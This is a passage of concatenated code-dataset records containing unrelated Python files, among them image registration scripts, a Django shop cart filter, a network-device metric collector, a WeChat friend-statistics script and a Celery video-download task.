A[0])\n#print('Angle 2 of rotation in radian= ', A[1])\n#print('Avarage 1 & 2 in radian= ', (A[0]+A[1])/2)\n\n\n\ntranslation = (-4.8, -146)\n\ntrans_mb=[]\nfor x in mb:\n trans_mb.append(x - translation)\nprint('\\n Translated top sensor coordinated == ', trans_mb)\n\nmb_GC = GCenter(mb)\nprint('\\n bottom needle frame GC = ', mb_GC[0],mb_GC[1])\ntrans_mb_GC = GCenter(trans_mb)\nprint('\\n trans_mt_GC needle frame GC = ', trans_mb_GC[0],trans_mb_GC[1])\n\nmt_GC = GCenter(mt)\nprint('\\n top needle frame GC = ', mt_GC[0],mt_GC[1])\n\ntranslation_sensors = np.array([(mb_GC[0] - trans_mb_GC[0]), (mb_GC[1] - trans_mb_GC[1])])\nprint('Translation vector of Sensors == ', translation_sensors)\n\n\"\"\"\n#nt_GC = GC(nt)\nnt_GC = GCenter(nt)\nprint('\\n top needle frame GC = ', nt_GC[0],nt_GC[1])\n\n# Digonal vectors of Bottom needle frame \nnb_GC = GCenter(nb)\n#nb_GC = GCenter(nb)\nprint('\\n bottom needle frame GC = ', nb_GC[0],nb_GC[1])\n#translation = np.array([(nb_GC[0] - nt_GC[0]), (nb_GC[1] - nt_GC[1])])\ntranslation = np.array([(nb_GC[0] - nt_GC[0]), (nb_GC[1] - nt_GC[1])])\n\nprint('\\n Translation vector of needle frames == ', translation)\n\ntrans_nt=[]\nfor x in nt:\n trans_nt.append(x + translation)\nprint('\\n top needle frame after translation = ', trans_nt)\n\ntrans_nt_GC = GCenter(trans_nt)\nprint('\\n trans_nt needle frame GC = ', trans_nt_GC[0],trans_nt_GC[1])\n\n\ndiff_nb_trans_nt = [(trans_nt[0][0]-nb[0][0],trans_nt[0][1]-nb[0][1]),(trans_nt[1][0]-nb[1][0],trans_nt[1][1]-nb[1][1]),(trans_nt[2][0]-nb[2][0],trans_nt[2][1]-nb[2][1]),(trans_nt[3][0]-nb[3][0],trans_nt[3][1]-nb[3][1])]\ndiff_nt_nb = [(nt[0][0]-nb[0][0],nt[0][1]-nb[0][1]),(nt[1][0]-nb[1][0],nt[1][1]-nb[1][1]),(nt[2][0]-nb[2][0],nt[2][1]-nb[2][1]),(nt[3][0]-nb[3][0],nt[3][1]-nb[3][1])]\n\nprint('\\nDifference in initial top and bottom bridge coordinates = \\n',np.round(diff_nt_nb,2))\nprint('\\nDifference in bottom and Translated top bridge coordinates = \\n', np.round(diff_nb_trans_nt,2))\n\no_b = nb_GC #GC of top needle frame\nnb_dig=[]\nfor x in nb:\n nb_dig.append(x - o_b)\ntrans_nt_dig=[]\nfor x in trans_nt:\n trans_nt_dig.append(x - o_b)\n\nA=[0,0,0,0]\nfor i in range(4):\n A[i]= angle(nb_dig[i],trans_nt_dig[i])\nprint('Angle 1 of rotation in radian= ', A[0])\n#print('Angle 2 of rotation in radian= ', A[1])\n#print('Avarage 1 & 2 in radian= ', (A[0]+A[1])/2)\n\n#b_o1= nb[0] - o_b\n#t_o1= trans_nt[0] - o_b\n#Angle1 = angle(b_o1,t_o1)\n#b_o2= nb[1] - o_b\n#t_o2= trans_nt[1] - o_b\n#Angle2 = angle(b_o2,t_o2)\n#print('\\n angle btw first digonals Angle1 == ',Angle1 )\n#print('\\n angle btw first digonals Angle2 == ',Angle2 )\n\ntrans_rotated_nt=[]\nfor x in trans_nt_dig:\n #trans_rotated_nt.append(rotate(x,(A[0]+A[1])/2) +o_b)\n #trans_rotated_nt.append(rotate(x,(1000000)/2) +o_b)\n #trans_rotated_nt.append(rotate(x,A[1]) +o_b)\n trans_rotated_nt.append(rotate(x,-A[0])+o_b)\nprint('\\n bottom fram after Rotation = ', trans_rotated_nt)\n\ndiff_nt_trans_rot_nb = [(trans_rotated_nt[0][0]-nb[0][0],trans_rotated_nt[0][1]-nb[0][1]),(trans_rotated_nt[1][0]-nb[1][0],trans_rotated_nt[1][1]-nb[1][1]),(trans_rotated_nt[2][0]-nb[2][0],trans_rotated_nt[2][1]-nb[2][1]),(trans_rotated_nt[3][0]-nb[3][0],trans_rotated_nt[3][1]-nb[3][1])]\nprint('\\nDifference in top and rotated bottom bridge coordinates = \\n', np.round(diff_nt_trans_rot_nb,2))\n\ntrans_mt=[]\nfor x in mt:\n trans_mt.append(x + translation)\n\nprint(' \\n top sensor after translation = ', trans_mt)\n\nmb_dig=[]\nfor x in mb:\n mb_dig.append(x - o_b)\ntrans_mt_dig=[]\nfor x in trans_mt:\n trans_mt_dig.append(x - o_b)\n \ntrans_rotated_mt=[]\n#for x in trans_mb_dig:\nfor x in trans_mt_dig:\n trans_rotated_mt.append(rotate(x,-A[0])+o_b)\n #trans_rotated_mb.append(rotate(x,(A[0]+A[1])/2) + o_b)\n\nprint(' \\n top sensor after translation and rotation= ', trans_rotated_mt)\n#print(trans_rotated_mb)\n\n#arr_mb_new = trans_rotated_mb\n\n#mt_GC = GC(mt)\nmt_GC = GCenter(trans_rotated_mt)\nprint('top sensor GC = %.3f'% mt_GC[0],mt_GC[1])\n#mb_GC = GC(arr_mb_new)\nmb_GC = GCenter(mb)\nprint('bottom sensor GC = %.3f'% mb_GC[0],mb_GC[1])\ntranslation_sensors = np.array([(mb_GC[0] - mt_GC[0]), (mb_GC[1] - mt_GC[1])])\n#translation_sensors = np.array([(mt_GC[0] - mb_GC[0]), (mt_GC[1] - mb_GC[1])])\n\nprint('Translation vector of Sensors == ', translation_sensors)\n\n\"\"\"\n\n\n","sub_path":"reverseEngineering.py","file_name":"reverseEngineering.py","file_ext":"py","file_size_in_byte":6235,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"63"} +{"seq_id":"55959725","text":"# coding=utf-8\r\n#微信 好友 地区数据统计 (会报错)\r\n\r\nfrom wxpy import *\r\nbot = Bot()\r\nbot = Bot(cache_path=True)\r\nfriends_stat = bot.friends().stats()\r\n\r\nfriend_loc = [] # 每一个元素是一个二元列表,分别存储地区和人数信息\r\nfor province, count in friends_stat[\"province\"].iteritems():\r\n if province != \"\":\r\n friend_loc.append([province, count])\r\n\r\n# 对人数倒序排序\r\nfriend_loc.sort(key=lambda x: x[1], reverse=True)\r\n\r\n# 打印人数最多的10个地区\r\nfor item in friend_loc[:10]:\r\n print(item[0], item[1])","sub_path":"wxpy03.py","file_name":"wxpy03.py","file_ext":"py","file_size_in_byte":563,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"63"} +{"seq_id":"644959724","text":"#!/usr/bin/python3\n\nimport sys\nsys.path.append(sys.path[0] + '/lib')\nfrom library import sieve_eratosthenes\nfrom euler import verify_result\n\n\ndef run_problem():\n sum = 0\n\n for i in list(sieve_eratosthenes(2000000)):\n sum += i\n\n return sum\n\nif __name__ == \"__main__\":\n verify_result(142913828922, run_problem)","sub_path":"problem010.py","file_name":"problem010.py","file_ext":"py","file_size_in_byte":327,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"63"} +{"seq_id":"346177310","text":"import numpy as np\nimport pandas as pd\nfrom skimage import transform\nfrom keras.preprocessing.image import load_img\n\n\n\ndef read_csv(paths):\n # read in csv from list of paths. Using pandas for easy handling\n driving_log = pd.DataFrame([])\n for path in paths:\n csv_data = pd.read_csv(path + \"driving_log.csv\", header=None,\n names=['Center Image', 'Left Image', 'Right Image', 'Steering Angle',\n 'Throttle', 'Break', 'Speed'])\n driving_log = pd.concat([driving_log, csv_data])\n return driving_log\n\n\ndef clean_data(driving_log, upper_angle=2.0, zero_frac=0.1):\n # clean the driving log data:\n\n a = driving_log.shape[0]\n\n # Safe small number of sample of going straight\n zero_lines = driving_log[driving_log['Steering Angle'] == 0]\n b = zero_lines.shape[0]\n zero_lines_sample = zero_lines.sample(frac=zero_frac, random_state=42)\n c = zero_lines_sample.shape[0]\n\n # Drop all samples of driving straight\n driving_log = driving_log[driving_log['Steering Angle'] != 0]\n d = driving_log.shape[0]\n\n # Drop samples with large steering angles left and right\n driving_log = driving_log[driving_log['Steering Angle'] < upper_angle]\n driving_log = driving_log[driving_log['Steering Angle'] > - upper_angle]\n e = driving_log.shape[0]\n\n # Add some samples of driving straight back in\n driving_log = pd.concat([driving_log, zero_lines_sample])\n f = driving_log.shape[0]\n\n # Print statistics\n print('Number of samples in input data:', a)\n print('Samples going straight:', b, ', Samples steering: ', d)\n print('Number of random samples going straight that are rescued (', zero_frac * 100, '% ):', c)\n print('Number after dropping large steering angles ( larger than +-', upper_angle, '):', e)\n print('Number of cleaned samples with rescued samples: ', f)\n\n return driving_log\n\n\ndef load_and_augment_image(sample):\n # Run randomize to determine what kind of augmentation is used.\n # There are 4 kinds of augmentations with 3 ways each\n # 1. Camera: left image | center image | right image\n # 2. Flip: normal | flipped\n # 3. Brightness: bright | normal | dark\n # 4. Horizontal shift: left | normal | right\n # 5. Vertical shift: up | normal | down\n\n rand = np.random.random(5)\n\n # 1. Camera: left image | center image | right image\n image, steering_angle = load_image(sample, rand[0])\n\n # 2. Flip: normal | flipped\n image, steering_angle = flip_image(image, steering_angle, rand[1])\n\n # 3. Brightness: bright | normal | dark\n image = brightness_image(image, rand[4])\n\n # 4. Horizontal shift: left | normal | right\n # image = h_shift_image(image, rand[2])\n\n # 5. Vertical shift: up | normal | down\n # image = v_shift_image(image, rand[3])\n\n return image, steering_angle\n\n\ndef load_image(sample, rand=0.5, steering_correction=0.15):\n # Load center, left or right image based on rand\n steering_angle = float(sample[3])\n if rand < 1 / 3:\n # Left image\n image_path = sample[1]\n steering_angle += steering_correction\n elif rand > 2 / 3:\n # Right image\n image_path = sample[2]\n steering_angle -= steering_correction\n else:\n # Center image\n image_path = sample[0]\n\n # Load image and steering angle\n image = load_img(image_path)\n return image, steering_angle\n\n\ndef flip_image(img, angle, rand=1.0):\n if rand < 0.5:\n img = np.fliplr(img)\n angle = angle * -1.0\n return img, angle\n\n\ndef brightness_image(img, rand=0.5):\n amount = (rand - 0.5) * 191 # * 255 * 0.75\n img = img + amount\n img = np.clip(img, 0, 255)\n return img\n\n\ndef v_shift_image(img, rand=0.5):\n if rand < 1 / 3:\n tform = transform.AffineTransform(rotation=0, shear=0, translation=(0, 20))\n img = transform.warp(img, tform)\n elif rand > 2 / 3:\n tform = transform.AffineTransform(rotation=0, shear=0, translation=(0, -20))\n img = transform.warp(img, tform)\n return img\n\n\ndef h_shift_image(img, rand=0.5):\n if rand < 1 / 3:\n tform = transform.AffineTransform(rotation=0, shear=0, translation=(50, 0))\n img = transform.warp(img, tform)\n elif rand > 2 / 3:\n tform = transform.AffineTransform(rotation=0, shear=0, translation=(-50, 0))\n img = transform.warp(img, tform)\n return img\n","sub_path":"helper.py","file_name":"helper.py","file_ext":"py","file_size_in_byte":4415,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"63"} +{"seq_id":"51590133","text":"# інтераткивний підруОснови Python. Контрольні завдання 3\n\ndef func(var_a, var_b):\n '''compares \"var_a\" and \"var_b\". returns \">\" \"=\" \"<\" or \"str\"\n '''\n if type(var_a) == str or type(var_b) == str:\n return 'str'\n if var_a > var_b :\n return '>'\n elif var_a == var_b:\n return '='\n elif var_a < var_b:\n return '<'\n\ndef count_holes(value):\n '''returns an integer - the number of “holes” in the record of this number, or the string 'error' if the argument passed does not satisfy the requirements: the number is not an integer or is not a number at all. Zeros at the beginning of the recording of a number are not taken into account, if any\n '''\n try:\n int(value)\n except:\n return 'error'\n count_h = 0\n for item in str(int(value)):\n if item in '4690':\n count_h += 1\n elif item == '8':\n count_h += 2\n if count_h == 0:\n return 'error'\n return count_h\n\ndef hangman(word, letters):\n '''The function replaces the letters in the string \"word\" with the underscore character \"_\", if they are not in the list of \"letters\" and returns the modified string'''\n new_word = ''\n for item in word:\n if item in letters:\n new_word += item\n else:\n new_word += ' _ '\n return new_word.strip()\n\nprint(func('2',3))\nprint(func(333,434))\nprint(func.__doc__)\n\nprint('0023 >> ', count_holes('0023'))\nprint('08824 >> ', count_holes('08824'))\nprint('00abc >> ', count_holes('00abc'))\nprint(count_holes.__doc__)\n\nprint(hangman('python', ['a', 'r', 'y', 'i', 'o']))\nprint(hangman.__doc__)","sub_path":"sensey_03.py","file_name":"sensey_03.py","file_ext":"py","file_size_in_byte":1672,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"63"} +{"seq_id":"26721954","text":"#!/usr/bin/env python\n# encoding: utf-8\n\nimport json\nimport requests\nfrom bson.objectid import ObjectId\nfrom tornado.web import RequestHandler\nfrom tornado.log import app_log\nfrom config import mongo_meida\nfrom config.category_tags import tags, SECOND_TYPE, FIRST_TYPE\nfrom config.color_synon import COLOR_SYNON\n# from icehole_client.search_client import SearchClient\n\nFILTER_SET = set()\n\nclass MeidaSkuToStar(RequestHandler):\n\n def initialize(self):\n self.item_collection = mongo_meida\n\n def get(self):\n item_id = self.get_argument('sku_id', '')\n color = self.get_argument('color', '')\n page = self.get_argument('page', '1')\n page_size = self.get_argument('page_size', '10')\n try:\n page = int(page)\n page_size = int(page_size)\n from_ = (page - 1) * page_size\n size = page_size\n except Exception as e:\n app_log.error(u\"页码信息不合法:\" + str(e))\n info = u\"页码信息不合法\"\n error = 0\n self.json_response(info=info, error=error)\n return\n if not item_id:\n app_log.error(u\"item_id为空\")\n info = u\"item_id为空\"\n error = 0\n self.json_response(info=info, error=error)\n return\n #try:\n if True:\n item = self.get_item(item_id)\n if item:\n search_text = color + item.get(\"title\")\n stars, item_desc = \\\n self.search_star_by_item(\n search_text, 0, from_, size)\n info = dict(\n sku_title=color+item_desc,\n stars=stars,\n )\n error = 1\n else:\n app_log.error(u\"没有找到单品\")\n info = u\"没有找到单品\"\n erorr = 0\n #except Exception as e:\n # app_log.error(u\"服务器错误:\" + str(e))\n # info = u\"服务器错误\"\n # error = 0\n self.json_response(info=info, error=error)\n\n\n def get_item(self, item_id):\n item = self.item_collection.find_one({\"_id\": ObjectId(item_id)})\n return item\n\n def search_star_by_item(self, title, gender, offset, limit):\n # title = u'黑色学院风2014秋季女鞋n字字母鞋韩版休闲松糕坡跟鞋运动跑步鞋女单单鞋'\n url = u\"http://192.168.1.24:8090/search?type=photo&query=%s&from=%s&size=%s\" % (title, offset, limit)\n if gender:\n url += u\"&{0}={1}\".format('gender', gender)\n #res = self.client.SearchStars(query=title, gender=gender, offset=offset, limit=limit)\n app_log.info(\"url is: \" + url)\n res = requests.get(url).json()\n stars = []\n item_desc = ''\n props = []\n sku_type = ''\n if res['status'] == 'ok':\n hits = res['result']['hits']\n stars = [self.build_item(hit) for hit in hits]\n props, sku_type = self.build_item_desc(res['result']['query']['tokens'])\n item_desc = u\"\".join(props) + sku_type\n return stars, item_desc\n\n\n def build_item(self, hit):\n source_data = hit.get(\"source\")\n return dict(\n id=source_data.get(\"id\"),\n url=source_data.get(\"srcImage\"),\n title=\"+\".join([part.values()[0] for part in source_data.get(\"parts\")])\n )\n\n\n def build_item_desc(self, tokens):\n #item_token_list = [token.get(\"text\") for token in tokens if token.get(\"text\") not in FILTER_SET]\n props = []\n for token in tokens:\n term = token.get(\"text\")\n if term in tags and len(term) > 1:\n props.append(term)\n elif term in SECOND_TYPE:\n second_type = term\n elif term in FIRST_TYPE:\n first_type = term\n if not second_type and first_type:\n second_type = first_type\n return set(props), second_type\n # return \"\".join(item_token_list)\n\n\n def json_response(self, info, error=0):\n self.set_header(\"content-type\", \"application/json\")\n if error == 0:\n result_dict = dict(result=0, data=\"\", error=info)\n elif error == 1:\n result_dict = dict(result=1, data=info, error=\"\")\n elif error == -1:\n result_dict = dict(result=-1, data=\"\", error=info)\n elif error == -2:\n result_dict = dict(result=-2, data=\"\", error=info)\n result_json = json.dumps(result_dict)\n var = self.get_argument(\"var\", \"\")\n if var:\n result_json = var + \"=\" + result_json\n self.write(result_json)\n\n\n","sub_path":"views/meida_star_to_sku.py","file_name":"meida_star_to_sku.py","file_ext":"py","file_size_in_byte":4722,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"63"} +{"seq_id":"541770008","text":"# -*- coding: utf-8 -*-\nfrom __future__ import unicode_literals\nfrom django.forms import widgets\nfrom django.forms.widgets import RadioFieldRenderer\nfrom django.utils.html import format_html, format_html_join\nfrom django.utils.datastructures import SortedDict\nfrom django.utils.translation import ugettext_lazy as _\nfrom django.utils.encoding import force_text\nfrom cms.plugin_pool import plugin_pool\nfrom cmsplugin_cascade.fields import PartialFormField\nfrom cmsplugin_cascade.widgets import MultipleCascadingSizeWidget\nfrom cmsplugin_cascade.link.forms import TextLinkForm\nfrom cmsplugin_cascade.link.plugin_base import LinkPluginBase, LinkElementMixin\n\n\nclass ButtonTypeRenderer(RadioFieldRenderer):\n \"\"\"\n Render sample buttons in different colors in the button's backend editor.\n \"\"\"\n BUTTON_TYPES = SortedDict((('btn-default', _('Default')), ('btn-primary', _('Primary')),\n ('btn-success', _('Success')), ('btn-info', _('Info')), ('btn-warning', _('Warning')),\n ('btn-danger', _('Danger')), ('btn-link', _('Link')),))\n\n def render(self):\n return format_html('
{0}
',\n format_html_join('\\n', '
'\n '{2}'\n '
{0}
',\n ((force_text(w), w.choice_value, force_text(self.BUTTON_TYPES[w.choice_value])) for w in self)\n ))\n\n\nclass ButtonSizeRenderer(RadioFieldRenderer):\n \"\"\"\n Render sample buttons in different sizes in the button's backend editor.\n \"\"\"\n BUTTON_SIZES = SortedDict((('btn-lg', _('Large')), ('', _('Default')), ('btn-sm', _('Small')),\n ('btn-xs', _('Extra small')),))\n\n def render(self):\n return format_html('
{0}
',\n format_html_join('\\n',\n '
'\n '{2}'\n '{2}
'\n '
{0}
'\n '
',\n ((force_text(w), w.choice_value, force_text(self.BUTTON_SIZES[w.choice_value])) for w in self)\n ))\n\n\nclass BootstrapButtonPlugin(LinkPluginBase):\n module = 'Bootstrap'\n name = _(\"Button\")\n form = TextLinkForm\n model_mixins = (LinkElementMixin,)\n parent_classes = ['BootstrapColumnPlugin']\n render_template = 'cascade/bootstrap3/button.html'\n allow_children = False\n text_enabled = True\n tag_type = None\n default_css_class = 'btn'\n default_css_attributes = ('button-type', 'button-size', 'button-options', 'quick-float',)\n fields = ('link_content', ('link_type', 'cms_page', 'ext_url', 'mail_to'), 'glossary',)\n glossary_fields = (\n PartialFormField('button-type',\n widgets.RadioSelect(choices=((k, v) for k, v in ButtonTypeRenderer.BUTTON_TYPES.items()),\n renderer=ButtonTypeRenderer),\n label=_('Button Type'),\n initial='btn-default',\n help_text=_(\"Display Link using this Button Style\")\n ),\n PartialFormField('button-size',\n widgets.RadioSelect(choices=((k, v) for k, v in ButtonSizeRenderer.BUTTON_SIZES.items()),\n renderer=ButtonSizeRenderer),\n label=_('Button Size'),\n initial='',\n help_text=_(\"Display Link using this Button Size\")\n ),\n PartialFormField('button-options',\n widgets.CheckboxSelectMultiple(choices=(('btn-block', _('Block level')), ('disabled', _('Disabled')),)),\n label=_('Button Options'),\n ),\n PartialFormField('quick-float',\n widgets.RadioSelect(choices=(('', _(\"Do not float\")), ('pull-left', _(\"Pull left\")), ('pull-right', _(\"Pull right\")),)),\n label=_('Quick Float'),\n initial='',\n help_text=_(\"Float the button to the left or right.\")\n ),\n ) + LinkPluginBase.glossary_fields + (\n PartialFormField('inline_styles',\n MultipleCascadingSizeWidget(['margin-top', 'margin-right', 'margin-bottom', 'margin-left'],\n allowed_units=['px', 'em'], required=False),\n label=_('Margins'),\n help_text=_('Margins for this button wrapper.')\n ),\n )\n\n class Media:\n css = {'all': ('cascade/css/admin/bootstrap.min.css', 'cascade/css/admin/bootstrap-theme.min.css',)}\n\n @classmethod\n def get_identifier(cls, obj):\n identifier = super(BootstrapButtonPlugin, cls).get_identifier(obj)\n content = obj.glossary.get('link_content')\n if not content:\n try:\n content = force_text(ButtonTypeRenderer.BUTTON_TYPES[obj.glossary['button-type']])\n except KeyError:\n content = _(\"Empty\")\n return format_html('{0}{1}', identifier, content)\n\nplugin_pool.register_plugin(BootstrapButtonPlugin)\n","sub_path":"cmsplugin_cascade/bootstrap3/buttons.py","file_name":"buttons.py","file_ext":"py","file_size_in_byte":5024,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"63"} +{"seq_id":"307537280","text":"from app import create_app\nfrom core.settings import get_config\n\n\nif __name__ == '__main__':\n app = create_app()\n app.run(\n host='0.0.0.0',\n debug=False if get_config().env == 'production' else True,\n port=8000,\n )\n","sub_path":"main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":245,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"63"} +{"seq_id":"642359048","text":"import logging\nimport time\nimport requests\nimport warnings\nwarnings.filterwarnings('ignore')\n\nlogger = logging.getLogger('json_collector')\n\n\nclass JsonCollector(object):\n\n def __init__(self, host, address, credential, port=443, timeout=15, retry=3, parsers=None,\n context=None, device_type='f5'):\n self.hostname = host\n self.host = address\n self.credential = credential\n self.__port = port\n self.__timeout = timeout\n self.__retry = retry\n self.__is_connected = False\n self.parsers = parsers\n if context:\n self.context = {k: v for i in context for k, v in i.items()}\n else:\n self.context = None\n self.facts = {}\n self.device_type = device_type\n self.base_url = 'http://{}/'.format(self.host)\n if port == 443:\n self.base_url = 'https://{}/'.format(self.host)\n elif port != 80:\n self.base_url = 'https://{}:{}/'.format(self.host, port)\n\n def connect(self):\n logger.info('Connecting to host: %s at %s', self.hostname, self.host)\n\n use_token = False\n user = self.credential.get('username')\n passwd = self.credential.get('password')\n if self.credential['method'] == 'vault':\n user, passwd = self._get_credentials_from_vault()\n if self.credential.get('use_token', 'false').lower() == 'true':\n use_token = True\n if not user or not passwd:\n logger.error('Invalid or no credentials specified')\n return\n self.session = requests.Session()\n self.session.auth = (user, passwd)\n self.session.verify = False\n self.__is_connected = True\n\n def collect_facts(self):\n logger.info('[%s]: Collecting Facts on device', self.hostname)\n\n if self.hostname:\n self.facts['device'] = self.hostname\n\n # TODO(Mayuresh) Collect any other relevant facts here\n\n def execute_query(self, query):\n for retry in range(self.__retry):\n logger.debug('[%s]: execute : %s', self.hostname, query)\n try:\n if self.device_type == 'f5':\n q = self.base_url + query\n result = self.session.get(q, timeout=self.__timeout)\n result.raise_for_status()\n return result.json()\n elif self.device_type == 'arista':\n q = self.base_url + 'command-api'\n body = {\n 'jsonrpc': '2.0',\n 'method': 'runCmds',\n 'params': {\n 'format': 'json',\n 'timestamps': False,\n 'autoComplete': False,\n 'expandAliases': False,\n 'cmds': [ query ],\n 'version': 1\n },\n 'id': 'MetricCollector-1'\n }\n result = self.session.post(q, timeout=self.__timeout, json=body)\n result.raise_for_status()\n resp = result.json()\n return resp['result'][0]\n except Exception as ex:\n logger.error('Failed to execute query: %s on %s: %s, retrying #%d', query, self.hostname, str(ex), retry)\n time.sleep(2)\n continue\n logger.error('Failed to connect to execute on %s at %s after %d tries', self.hostname, self.host, self.__retry)\n\n def collect(self, command):\n\n # find the command/query to execute\n logger.debug('[%s]: parsing : %s', self.hostname, command)\n parser = self.parsers.get_parser_for(command)\n try:\n if self.device_type == 'f5':\n raw_data = self.execute_query(parser['data']['parser']['query'])\n elif self.device_type == 'arista':\n raw_data = self.execute_query(parser['data']['parser']['command'])\n except TypeError as e:\n logger.error('Parser returned no data. Message: {}'.format(e))\n raw_data = None\n if not raw_data:\n return None\n datapoints = self.parsers.parse(command, raw_data)\n\n if datapoints is not None:\n measurement = self.parsers.get_measurement_name(input=command)\n timestamp = time.time_ns()\n for datapoint in datapoints:\n if not datapoint['fields']:\n continue\n if datapoint['measurement'] is None:\n datapoint['measurement'] = measurement\n datapoint['tags'].update(self.facts)\n if self.context:\n datapoint['tags'].update(self.context)\n datapoint['timestamp'] = timestamp\n yield datapoint\n\n else:\n logger.warn('No parser found for command > %s', command)\n return None\n\n def is_connected(self):\n return self.__is_connected\n\n def close(self):\n # rest connection is not stateful so nothing to close\n return\n","sub_path":"lib/metric_collector/json_collector.py","file_name":"json_collector.py","file_ext":"py","file_size_in_byte":5125,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"63"} +{"seq_id":"607402663","text":"from django import template\n\nregister = template.Library()\n\n@register.filter(name='is_prd_in_cart')\ndef is_prd_in_cart(product , cart):\n keys = cart.keys()\n for id in keys:\n if int(id) == product.id:\n return True\n return False\n\n@register.filter(name='cart_qty')\ndef cart_qty(product , cart):\n keys = cart.keys()\n for id in keys:\n if int(id) == product.id:\n return cart.get(id)\n return 0\n\n@register.filter(name='total_price')\ndef total_price(product , cart):\n return product.Price * cart_qty(product,cart) \n\n@register.filter(name='total_cart_price')\ndef total_cart_price(products,cart):\n sum=0\n for p in products:\n sum+=total_price(p,cart)\n return sum ","sub_path":"Epshop/store/templatetags/cart.py","file_name":"cart.py","file_ext":"py","file_size_in_byte":741,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"63"} +{"seq_id":"148935354","text":"import numpy as np\nimport sys\n#import SimpleITK as sitk\nimport subprocess\nimport itertools\nimport os\nimport glob\n#try:\n\ndef load_names(DIR):\n DIR = os.path.join(DIR, '*')\n b=glob.glob(DIR)\n M,M_seg=[],[]\n for i in b:\n if i.split('/')[-1][:12]:\n paths=glob.glob(i+'/*')\n c,d=[],[]\n if len(paths)==3: \n for j in paths:\n a=j.split('/')\n if a[-1].startswith('00_seg'):\n M_seg.append(j)\n elif a[-1].split('_')[3]=='11':\n M.append(j)\n F='/data/Liver_part/Multi_modality_data/700005_HELENA_20150527/700005_HELENA_20150527_11_3D_GRE_TRA_HELENA_W.nrrd'\n F_seg='/data/Liver_part/Multi_modality_data/700005_HELENA_20150527/00_seg, 30.08.2017, 700005_HELENA_20150527_11_3D_GRE_TRA_HELENA_W.nrrd'\n return F, M, F_seg, M_seg\n\ndef ANTs_on_data(Dir):\n\n F, M, F_seg, M_seg= load_names(Dir)\n out_DIR='/data/fahad_thesis/Result/'\n for i in range(len(M)):\n\n f_seg, m_seg=[],[]\n out_f_seg, out_m_seg=[], []\n '''Generating the output filenames'''\n if not os.path.exists(os.path.join(out_DIR, M[i].split(\"/\")[-2])):\n os.makedirs(os.path.join(out_DIR, M[i].split(\"/\")[-2]))\n\n out_M_img = os.path.join(out_DIR,M[i].split('/')[-2], M[i].split('/')[-1])\n field = os.path.join(out_DIR,M[i].split('/')[-2], 'field')\n\n command = [\"/home/hfahad/ANTs/bin/bin/antsRegistration\", '--dimensionality', '3',\n '--write-composite-transform', '1','--output', '['+field+','+out_M_img+']', '--float','0',\\\n '--interpolation', 'Linear', '--winsorize-image-intensities', '[0.005,0.995]',\\\n '--use-histogram-matching', '0', '--verbose', '1', '--initial-moving-transform','['+F+','+M[i]+',1]',\\\n\t\t'--transform', 'SyN[0.25]', '--metric', 'CC['+F+','+M[i]+',1,4]',\\\n\t\t'--convergence',\\\n '[500x250x200x200,1e-6,20]', '--shrink-factors', '8x4x2x1', '--smoothing-sigmas', '3x2x1x0vox',\\\n ]\n cmd = subprocess.Popen(command)\n cmd.communicate()\n\n out_m_seg = os.path.join(out_DIR,M_seg[i].split('/')[-2],M_seg[i].split('/')[-1])\n\n command = [\"/home/hfahad/ANTs/bin/bin/antsApplyTransforms\", '-d', '3', '-i', M_seg[i], '-r', F,\n '--interpolation', 'NearestNeighbor', '-o', out_m_seg, '-t', field+'Composite.h5']\n cmd = subprocess.Popen(command)\n cmd.communicate()\n\nprint('Program is start')\nANTs_on_data('/data/Liver_part/Multi_modality_data/crop_multi_data')\n\n\n","sub_path":"mono_liver_ants/Mono-modal/ANTsWorkflow.py","file_name":"ANTsWorkflow.py","file_ext":"py","file_size_in_byte":2599,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"63"} +{"seq_id":"255085635","text":"import os\nimport re\nimport json\nimport requests\nimport urllib\n\nfrom celery import Celery\nfrom lxml import etree\n\nfrom . import flask_app, db\nfrom .models import Task\n\n\ndef make_celery(flask_app):\n celery = Celery(\n flask_app.import_name,\n backend=flask_app.config['CELERY_RESULT_BACKEND'],\n broker=flask_app.config['CELERY_BROKER_URL']\n )\n celery.conf.update(flask_app.config)\n\n class ContextTask(celery.Task):\n def __call__(self, *args, **kwargs):\n with flask_app.app_context():\n return self.run(*args, **kwargs)\n\n celery.Task = ContextTask\n return celery\n\n\nflask_celery = make_celery(flask_app)\n\n\n@flask_celery.task\ndef download_video(task_id, path):\n task = Task.query.get(task_id)\n\n headers = {\n 'User-Agent':\n 'Mozilla/5.0 (Macintosh; Intel Mac OS X 10_13_1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/63.0.3239.84 Safari/537.36',\n }\n\n s = requests.Session()\n resp = s.get(task.url, headers=headers)\n html = etree.HTML(resp.content)\n\n site = \"pornhub\"\n if task.url.startswith(\"https://www.xvideos.com\"):\n site = \"xvideos\"\n\n # 获取视频标题\n title = get_title(html, site)\n\n # 更新任务标题和状态\n task.title = title\n task.status = 1\n db.session.add(task)\n db.session.commit()\n\n # 开始下载视频\n download_url = get_download_url(html, site)\n\n try:\n download(path, download_url, title, 'mp4')\n task.status = 2\n except Exception:\n print(\"download exception\")\n task.status = -1\n pass\n\n db.session.add(task)\n db.session.commit()\n\n\ndef download(path, url, name, filetype):\n filepath = '%s/%s.%s' % (path, name, filetype)\n if os.path.exists(filepath):\n return\n urllib.request.urlretrieve(url, '%s' % filepath)\n\n\ndef get_download_url(html, site):\n if site == \"xvideos\":\n return html.cssselect(\"#html5video_base\")[0].xpath(\"div//a\")[-1].values()[1]\n elif site == \"pornhub\":\n js = html.xpath('//*[@id=\"player\"]/script/text()')[0]\n tem = re.findall('var\\\\s+\\\\w+\\\\s+=\\\\s+(.*);\\\\s+var player_mp4_seek', js)[-1]\n con = json.loads(tem)\n for _dict in 